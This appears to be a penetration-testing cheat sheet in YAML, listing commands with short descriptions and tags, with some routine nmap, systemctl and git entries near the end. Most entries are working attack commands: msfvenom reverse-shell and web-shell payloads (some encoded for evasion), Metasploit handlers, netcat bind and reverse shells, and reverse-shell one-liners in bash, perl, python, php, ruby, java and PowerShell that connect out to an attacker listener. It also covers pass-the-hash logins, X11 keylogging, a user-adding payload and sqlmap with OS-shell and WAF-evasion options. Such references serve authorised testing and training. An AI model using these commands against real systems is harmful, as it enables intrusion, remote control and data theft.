powerview.md Printerbug-and-Petitpotam Printerbug-and-Petitpotam.md Print-the-last-lines-of-a-containers-logs-and-following-its-logs.md Print-the-last-lines-of-a-containers-logs.md Print-the-last-lines-of-a-services-logs-and-following-its-logs.md Print-the-last-lines-of-a-services-logs.md procdump procdump.md QR-code QR-code.md race-condition race-condition.md rar rar.md rdesktop rdesktop.md Redis Redis.md responder responder.md reverse-shell reverse-shell.md rpcclient rpcclient.md rubeus rubeus.md run-mysql-container.md Scripting-Payloads Scripting-Payloads.md SCShell SCShell.md Searchsploit Searchsploit.md sed sed.md server server.md Service Service.md smb smbmap smbmap.md smb.md SMTP SMTP.md snmp snmp.md socat socat.md SQLMAP SQLMAP.md ssh ssh.md Stop-a-running-container-through-SIGKILL.md Stop-a-running-container-through-SIGTERM.md Stops-containers-and-removes-containers-networks-created-by-up.md systemctl systemctl.md tar tar.md telnet telnet.md Tomcat Tomcat.md unblob unblob.md veracrypt veracrypt.md VNC VNC.md WEB WEB.md web-shell web-shell.md wfuzz wfuzz.md wifi wifi.md windows windows.md windows-rdp windows-rdp.md winrm winrm.md WPSCAN WPSCAN.md X11 X11.md xfreerdp xfreerdp.md ysoserial ysoserial.md ysoserial.net ysoserial.net.md yum yum.md zip zip.md
|
||
lang: ps1
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: Enable winrm (powershell)
|
||
- cmd: wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
|
||
lang: sh
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: Enable winrm (wmic)
|
||
- cmd: Test-WSMan -computername <computername>
|
||
lang: ps1
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: Test target is configure to use winrm (powershell)
|
||
- cmd: Invoke-Command -computername <computername> -ScriptBlock {<cmd>} -credential <domain>\<username>
|
||
lang: ps1
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: Execute a command on the target over winrm (powershell)
|
||
- cmd: Invoke-Command -ComputerName <computername> -FilePath <path_to_script> -credential <domain>\<username>
|
||
lang: ps1
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: Execute a script on the target over winrm (powershell)
|
||
- cmd: Enter-PSSession -ComputerName <computername> -Credential <domain>\<username>
|
||
lang: ps1
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: Get a powershell session with winrm (powershell)
|
||
- cmd: .\PsExec.exe \\<computername> -u <domain>\<username> -p <password> -h -d powershell.exe "enable-psremoting -force"
|
||
lang: sh
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: Enable winrm remotelly from psexec
|
||
- cmd: gem install evil-winrm
|
||
lang: sh
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: evil-winrm install
|
||
- cmd: evil-winrm -i <ip>/<domain> -u <user> -p <password>
|
||
lang: sh
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: evil-winrm use
|
||
- cmd: evil-winrm -i <ip>/<domain> -u <user> -H <hash>
|
||
lang: sh
|
||
tags: windows, remote, winrm, evilwinrm, 5985, 5986
|
||
desc: evil-winrm use pass the hash
|
||
- cmd: nmap -sV --script x11-access -p <port> <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: '- check anonymous connection'
|
||
- cmd: xdpyinfo -display <ip>:<display>
|
||
lang: sh
|
||
tags: x11, 6000
|
||
desc: x11 - verify connection
|
||
- cmd: xwininfo -root -tree -display <ip>:<display>
|
||
lang: sh
|
||
tags: x11, 6000
|
||
desc: x11 - verify connection (2)
|
||
- cmd: xwd –root –screen –silent –display <ip>:<display> > screenshot.xwd; convert screenshot.xwd screenshot.png
|
||
lang: sh
|
||
tags: x11, 6000
|
||
desc: X11 - screenshot
|
||
- cmd: xspy <ip>
|
||
lang: sh
|
||
tags: x11, 6000
|
||
desc: X11 - keylogging
|
||
- cmd: xrdp <ip>:<display>
|
||
lang: sh
|
||
tags: x11, 6000
|
||
desc: X11 - remote desktop view
|
||
- cmd: msfconsole -x "use exploit/unix/x11/x11_keyboard_exec; set RHOSTS <rhost>; set payload cmd/unix/reverse_bash; set lhost <lhost>; set lport <lport>; exploit"
|
||
lang: sh
|
||
tags: x11, 6000
|
||
desc: X11 - msf reverse shell
|
||
- cmd: msf-pattern_create -l <size>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: bof, pattern creation
|
||
- cmd: msf-pattern_offset -l <size> -q <pattern>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: bof, pattern offset
|
||
- cmd: msf-nasm_shell # nasm > jmp esp
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: bof, nasm - show opcode from asm
|
||
- cmd: ROPgadget --binary <binary>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: ropgadget - Specify a binary filename to analyze
|
||
- cmd: ROPgadget --binary <binary> --ropchain
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: ropgagdet - Enable the ROP chain generation
|
||
- cmd: ROPgadget --binary <binary> --opcode <opcode>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: ropgagdet - Search opcode in executable segment
|
||
- cmd: ROPgadget --binary <binary> --string <string> --range <start_address>-<end_address>; ROPgadget --binary <binary> --only="<instructions>"; ROPgadget --binary <binary> --filter="<instructions>"
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: ropgadget - Search string between two addresses (0x...-0x...)
|
||
- cmd: !mona modules
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Show all loaded modules and their properties
|
||
- cmd: !mona config -set workingfolder <path|c:\logs\%p>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Configure the log directory (no need to create it)
|
||
- cmd: !mona config -get workingfolder
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Verify the current the log directory
|
||
- cmd: !mona pc <pattern_size|400>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Create a cyclic pattern of a given size
|
||
- cmd: !mona findmsp
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Find cyclic pattern in memory
|
||
- cmd: !mona po <pattern_value|41346541>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Find location (offset) of 4 bytes in a cyclic pattern
|
||
- cmd: !mona find -s <pattern_value|"w00tw00t">
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: 'mona - Find bytes in memory (ex: eggs)'
|
||
- cmd: !mona jmp -r <reg_name|esp> -n
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Find pointers that will allow you to jump to a register (without null bytes)
|
||
- cmd: !mona getiat -s <function_name|*strcpy*>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Find a function in IAT
|
||
- cmd: !mona sehchain
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Show the current SEH chain
|
||
- cmd: !mona bpseh
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Set a breakpoint on all current SEH Handler function pointers
|
||
- cmd: !mona seh
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: 'mona - Find pointers to assist with SEH overwrite exploits (default: no aslr, no rebase, no safeseh)'
|
||
- cmd: !mona bytearray -cpb <excluded_bytes|'\x00\x0a\x0d'>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Badchar hunting step 1 - Creates a byte array
|
||
- cmd: !mona compare -f <input_file|C:\BadChars\bytearray.bin> -a <bytesarray_address|esp>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Badchar hunting step 3 - compare until "!!! Hooray, normal shellcode unmodified !!!" message
|
||
- cmd: !mona rop -cm aslr=false,rebase=false
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: 'mona - Finds gadgets that can be used in a ROP exploit and do ROP magic with them (Note : can take 20 minutes)'
|
||
- cmd: !mona stackpivot -cm os=true -distance <min,max|12,12>
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Finds stackpivots (move stackpointer to controlled area)
|
||
- cmd: !mona find -type file -s <input_file|C:\stackpivot.txt> -p2p
|
||
lang: sh
|
||
tags: bof, buffer overflow
|
||
desc: mona - Show pointers to pointers to the pattern (might take a while !)
|
||
- cmd: msfvenom --list payloads
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: msfvenom payloads list
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f exe > shell.exe
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: msfvenom - payload windows x86 meterpeter unstagged
|
||
- cmd: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: Linux Meterpreter Reverse Shell
|
||
- cmd: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip|tun0> LPORT=<port> prependfork=true -f elf -t 300 -e x64/xor_dynamic -o test.elf
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: Linux x64 Meterpreter Reverse tcp
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: Windows Meterpreter Reverse TCP Shell
|
||
- cmd: msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<local> -f exe > shell.exe
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: Windows Reverse TCP Shell
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<local> -e shikata_ga_nai -i 3 -f exe > encoded.exe
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: Windows Encoded Meterpreter Windows Reverse Shell
|
||
- cmd: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho > shell.macho
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: Mac Reverse Shell
|
||
- cmd: msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=<port|443> -f exe -o /var/www/html/msfnonstaged.exe
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: meterpreter x64 - https - non staged
|
||
- cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> -f exe -o /var/www/html/msfstaged.exe
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: meterpreter x64 - https - staged
|
||
- cmd: msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.php
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: Web Payloads
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: ASP Meterpreter Reverse TCP
|
||
- cmd: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: JSP Java Meterpreter Reverse TCP
|
||
- cmd: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: WAR
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f vbapplication
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: VBA 32bits
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f ps1
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: powershell 32 bits
|
||
- cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> -f dll -o <dll|output.dll>
|
||
lang: sh
|
||
tags: msfvenom, reverse shell
|
||
desc: DLL
|
||
- cmd: msfvenom -p cmd/unix/reverse_python LHOST=<ip> LPORT=<port> -f raw > shell.py
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Python Reverse Shell
|
||
- cmd: msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=<port> -f raw > shell.sh
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Bash Unix Reverse Shell
|
||
- cmd: msfvenom -p cmd/unix/reverse_perl LHOST=<ip> LPORT=<port> -f raw > shell.pl
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Perl Unix Reverse shell
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f ps1
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Powershell
|
||
- cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> --encrypt xor --encrypt-key <key> -f csharp
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Csharp - xor encrypted
|
||
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Windows Meterpreter Reverse TCP Shellcode
|
||
- cmd: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Linux Meterpreter Reverse TCP Shellcode
|
||
- cmd: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Mac Reverse TCP Shellcode
|
||
- cmd: msfvenom -p windows/adduser USER=<user|hacker> PASS='<pass|Hacker123$>' -f exe > adduser.exe
|
||
lang: sh
|
||
tags: pentest
|
||
desc: MCreate User
|
||
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port>; set payload windows/meterpreter/reverse_tcp; exploit"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Metasploit Handler windows tcp 32bits staged
|
||
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/meterpreter/reverse_https; set EXITFUNC thread; exploit"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Metasploit Handler windows https 32bits staged
|
||
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter/reverse_https; exploit"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Metasploit Handler windows https 64bits staged
|
||
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter_reverse_https; exploit"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Metasploit - Handler windows https 64bits unstaged
|
||
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter/reverse_https; set EXITFUNC thread; set EnableStageEncoding true; set StageEncoder <encoder|x64/xor_dynamic>; exploit"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Metasploit - Handler windows https 64bits stagged - encoded xor
|
||
- cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip|tun0>; set lport <lport|443>; set payload windows/x64/meterpreter/reverse_https; set EXITFUNC thread; set EnableStageEncoding true; set StageEncoder x64/xor_dynamic; exploit"
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Metasploit - Handler linux tcp 64bits stagged - encoded xor
|
||
- cmd: nc -nlvp <lport>
|
||
lang: sh
|
||
tags: nc, netcat
|
||
desc: nc setup listener
|
||
- cmd: nc -nlvp <port> -e cmd.exe
|
||
lang: sh
|
||
tags: nc, netcat
|
||
desc: nc bind shell windows
|
||
- cmd: nc -nlvp <port> -e /bin/bash
|
||
lang: sh
|
||
tags: nc, netcat
|
||
desc: nc bind shell linux
|
||
- cmd: nc -nv <ip> <port> -e cmd.exe
|
||
lang: sh
|
||
tags: nc, netcat
|
||
desc: nc reverse shell windows
|
||
- cmd: nc -nv <ip> <port> -e /bin/bash
|
||
lang: sh
|
||
tags: nc, netcat
|
||
desc: nc reverse shell linux
|
||
- cmd: nc -nlvp <port> > <incomming_file>
|
||
lang: sh
|
||
tags: nc, netcat
|
||
desc: nc transfer file - receiver
|
||
- cmd: nc -nv <ip> <port> < <file_to_send>
|
||
lang: sh
|
||
tags: nc, netcat
|
||
desc: nc transfer file - sender
|
||
- cmd: ncat --exec cmd.exe --allow <allowed_ip> -vnl <port> --ssl
|
||
lang: sh
|
||
tags: ncat
|
||
desc: ncat bind shell ssl filtered
|
||
- cmd: ncat -v <ip> <port> --ssl
|
||
lang: sh
|
||
tags: ncat
|
||
desc: ncat bind shell ssl connection
|
||
- cmd: ncat --listen --proxy-type http <port>
|
||
lang: sh
|
||
tags: ncat
|
||
desc: ncat HTTP WEB proxy
|
||
- cmd: bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
|
||
lang: sh
|
||
tags: pentest
|
||
desc: bash reverse shell
|
||
- cmd: perl -e 'use Socket; $i="<lhost>"; $p=<lport>; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); }; '
|
||
lang: sh
|
||
tags: pentest
|
||
desc: perl reverse shell
|
||
- cmd: python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<lhost>",<lport>)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); '
|
||
lang: sh
|
||
tags: pentest
|
||
desc: python reverse shell
|
||
- cmd: php -r '$sock=fsockopen("<lhost>",<lport>); exec("/bin/sh -i <&3 >&3 2>&3"); '
|
||
lang: sh
|
||
tags: pentest
|
||
desc: php reverse shell
|
||
- cmd: ruby -rsocket -e'f=TCPSocket.open("<lhost>",<lport>).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: ruby reverse shell
|
||
- cmd: 'r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<lhost>/<lport>; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()'
|
||
lang: java
|
||
tags: pentest
|
||
desc: '[[java]] reverse shell'
|
||
- cmd: $client = New-Object System.Net.Sockets.TCPClient('<lhost>',<lport>); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()
|
||
lang: ps1
|
||
tags: pentest
|
||
desc: '[[Arsenal/Windows/powershell]] reverse shell'
|
||
- cmd: rlwrap nc -nlvp <port>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: windows listener autocompletion
|
||
- cmd: python -c 'import pty; pty.spawn("/bin/bash")'
|
||
lang: sh
|
||
tags: pentest
|
||
desc: interactive reverse shell - and Ctrl+Z (1)
|
||
- cmd: stty raw -echo
|
||
lang: sh
|
||
tags: pentest
|
||
desc: interactive reverse shell - on host - and do fg (2)
|
||
- cmd: reset; stty rows <ROWS> cols <COLS>; export TERM=xterm-256color
|
||
lang: sh
|
||
tags: pentest
|
||
desc: interactive reverse shell - on reverse (3)
|
||
- cmd: weevely generate <password> <output_file|web_shell.php>
|
||
lang: sh
|
||
tags: web, shell, webshell, shellweb, weevely
|
||
desc: weevely web shell generation with output file
|
||
- cmd: weevely <url> <password>
|
||
lang: sh
|
||
tags: web, shell, webshell, shellweb, weevely
|
||
desc: weevely web shell connection
|
||
- cmd: sqlmap -u <url> -p <arguments> --dbs
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: basic sqlmap step 1
|
||
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type>
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: basic sqlmap step 2
|
||
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> --tables
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: basic sqlmap step 3
|
||
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> -T <tables> --columns
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: basic sqlmap step 4
|
||
- cmd: sqlmap -u <url> -p <arguments> --dbms=<database_type> -D <database_name> -T <tables> -C <columns> --dump
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: basic sqlmap step 5
|
||
- cmd: sqlmap -u <url> --dbs
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - list dbs
|
||
- cmd: sqlmap -u <url> -D <db> --tables
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - list tables
|
||
- cmd: sqlmap -u <url> -D <db> -T <table> --dump
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - dump a table
|
||
- cmd: sqlmap -u <url> -D <db> -T <table> --columns
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - list columns of a table
|
||
- cmd: sqlmap -u <url> -D <db> -T <table> -C <c1>,<c2> --dump; sqlmap -u <url> --os-shell; sqlmap -u <url> --file-read=<remote_file>; sqlmap -u <url> --file-write=<local_file> --file-dest=<remote_path_destination>
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - dump only some tables columns
|
||
- cmd: sqlmap -u <url>
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - classic get
|
||
- cmd: sqlmap -u <url> -d "<params>"; sqlmap -u <url> --cookie=<cookie>
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - classic post
|
||
- cmd: sqlmap -r <request_file>; sqlmap -u '<url>' tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - use file
|
||
- cmd: sqlmap -u '<url>' --level=5 --risk=3 -p '<parameter>' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - hardcore
|
||
- cmd: sqlmap -u <url> --dbms=MYSQL tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - mysql tamper list
|
||
- cmd: sqlmap -u <url> --dbms=MSSQL tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
|
||
lang: sh
|
||
tags: sql injection
|
||
desc: sqlmap - mssql tamper list
|
||
- cmd: cve-bin-tool <target>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: cve-bin-tool - scan target (file or directory) to detect versions and CVEs of embedded open source components
|
||
- cmd: cve-bin-tool --offline <target>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: cve-bin-tool - offline scan
|
||
- cmd: cve-bin-tool -r <component> <target>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: cve-bin-tool - scan for a given open source component (e.g. openssl)
|
||
- cmd: cve-bin-tool -f html <target>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: cve-bin-tool - build HTML report
|
||
- cmd: docker run --rm -it -v `pwd`:/tmp/EyeWitness eyewitness --web -x /tmp/EyeWitness/<nmap_file>.xml --prepend-https
|
||
lang: sh
|
||
tags: pentest
|
||
desc: eyewitness - web screenshots
|
||
- cmd: docker run --rm -v $(pwd):/data -p7171:7171 leonjza/gowitness gowitness nmap -f /data/<nmap_file>.xml
|
||
lang: sh
|
||
tags: pentest
|
||
desc: gowitness - web screenshots (nmap xml file)
|
||
- cmd: docker run --rm -v $(pwd):/data -p7171:7171 leonjza/gowitness gowitness file -f /data/<file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: gowitness - web screenshots (file containing urls)
|
||
- cmd: nmap -sn <ip_range>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - hosts alive
|
||
- cmd: nmap -sC -sV <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - classic scan
|
||
- cmd: nmap -iL <targets_file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - read targets from a file
|
||
- cmd: nmap -sC -sV -oA <output_file> <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - classic scan + save
|
||
- cmd: nmap --top-ports 100 --open -sV <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - quick scan top ports 100
|
||
- cmd: nmap --top-ports 5000 --open -sV <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - big top ports 5000
|
||
- cmd: nmap -p- -sV <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - full port
|
||
- cmd: nmap <ip> -p<port_list> --open
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - host with a given port
|
||
- cmd: IP=<ip>; ; ports=$(nmap -p- --min-rate=1000 -n -T4 $IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); ; nmap -Pn -sC -sV -p$ports $IP -oN scan.txt --reason --script=vuln
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - FULL
|
||
- cmd: nmap -sU <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - udp scan
|
||
- cmd: nmap --max-rate 100 -sC -sV <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - low rate Classic
|
||
- cmd: masscan -p 1-65535 <ip> -e <dev> --rate=1000
|
||
lang: sh
|
||
tags: pentest
|
||
desc: massscan - full port
|
||
- cmd: nmap -Pn -sS -T4 --open --script smb-security-mode -p445 <ip>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap - SMB signing disabled
|
||
- cmd: proxychains nmap -n -sT -sV -Pn --open -oA <output_file> -iL <targets_file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: nmap behind proxy - tcp connect (-sT) - no dns (-n)
|
||
- cmd: service --status-all
|
||
lang: sh
|
||
tags: pentest
|
||
desc: List services
|
||
- cmd: service <service_name> status
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Status of a service
|
||
- cmd: service <service_name> start
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Start a service
|
||
- cmd: service <service_name> stop
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Stop a service
|
||
- cmd: service <service_name> restart
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Restart a service
|
||
- cmd: systemctl start <service_inactive>
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: Start service
|
||
- cmd: systemctl stop <service_active>
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: Stop service
|
||
- cmd: systemctl enable <service_disabled>
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: Enable service
|
||
- cmd: systemctl disable <service_enabled>
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: Disable service
|
||
- cmd: systemctl restart <service>
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: Restart service
|
||
- cmd: systemctl reload <service_active>
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: Reload service
|
||
- cmd: systemctl status <service>
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: Service status
|
||
- cmd: systemctl list-units --type=service --state=running
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: List running services
|
||
- cmd: systemctl list-unit-files --type=service --state=enabled
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: List enabled services
|
||
- cmd: systemctl list-unit-files --type=service --state=disabled
|
||
lang: sh
|
||
tags: systemctl, service
|
||
desc: List disabled services
|
||
- cmd: git config --global user.name <name>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Set global git user name
|
||
- cmd: git config --global user.email <email>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Set global git user email
|
||
- cmd: git init
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Initializes a git repository
|
||
- cmd: git clone -b <branch_name> <repository> <clone_directory>
|
||
lang: sh
|
||
tags: pentest
